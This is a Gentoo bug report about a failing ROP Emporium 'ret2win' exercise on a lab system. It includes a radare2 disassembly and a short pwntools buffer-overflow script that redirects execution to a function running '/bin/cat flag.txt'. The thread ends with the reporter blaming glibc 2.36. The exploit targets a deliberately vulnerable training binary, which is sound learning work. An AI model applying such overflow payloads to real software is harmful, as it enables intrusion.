Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 880223 - cwd is unlinked before the process closes
Summary: cwd is unlinked before the process closes
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: Current packages (show other bugs)
Hardware: AMD64 Linux
: High normal (vote)
Assignee: Gentoo Linux bug wranglers
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2022-11-07 16:40 UTC by jek1
Modified: 2022-11-11 10:17 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description jek1 2022-11-07 16:40:15 UTC 
The exploit I attached couldn't cat flag.txt which is stored in the same directory as the binary's. I tried running that script with strace and found this sus thing right where the program should cat flag.txt. 
/proc/pid/cwd exists when the program waits for input.

```
readlink("/proc/30556/cwd", 0x7ffcefe695a0, 4096) = -1 ENOENT (No such file or directory)
```

function that cats flag.txt:

```
[0x7f4f566fa920]> pdf @ sym.ret2win
┌ 27: sym.ret2win ();
│           0x00400756      55             push rbp
│           0x00400757      4889e5         mov rbp, rsp
│           0x0040075a      bf26094000     mov edi, str.Well_done__Heres_your_flag: ; 0x400926 ; "Well done! Here's your flag:"
│           0x0040075f      e8ecfdffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00400764      bf43094000     mov edi, str._bin_cat_flag.txt ; 0x400943 ; "/bin/cat flag.txt"
│           0x00400769      e8f2fdffff     call sym.imp.system         ; int system(const char *string)
│           0x0040076e      90             nop
│           0x0040076f      5d             pop rbp
└           0x00400770      c3             ret
[0x7f4f566fa920]>
```


ss of the issue: 
https://imgur.com/a/PB6uQkO

I've tried it on kali, arch, debian and ubuntu in the past.
This is the first time I'm using Gentoo as a bin exploit lab.


link to challenge: https://ropemporium.com/challenge/ret2win.html

exploit i used:
 
```
from pwn import *

context.arch = 'amd64'
context.log_level = "error"

exe = ELF("./ret2win")

offset = 40
payload = flat({
    offset:[
        p64(0x00400756)
    ]
})

io = process(exe.path)

io.sendlineafter(b"\n> ", payload)
print(io.recvallS())

```

kernel: 6.0.7
python: 3.10.8
full strace of exploit: https://jek1.co/pastes/strace.txt
Comment 1 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-11-10 03:27:31 UTC 
1. I'm struggling to see how this would vary across distros at all unless kernel configuration, version, or sysctl toggles are different.

2. Please include a clear set of instructions to reproduce.

3. Please include a text version of the screenshot.
Comment 2 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-11-10 03:48:19 UTC 
Just to add: it's not clear anything is actually wrong here with anything we're doing. Exploit development involves handling various edge cases and different behaviour on systems. While it's interesting that you supposedly see something different on Debian, that doesn't make it something that it's my role to fix. For all I know, you just need to adapt your code.
Comment 3 jek1 2022-11-11 10:17:02 UTC 
yea mb, those bins don't work with glibc 2.36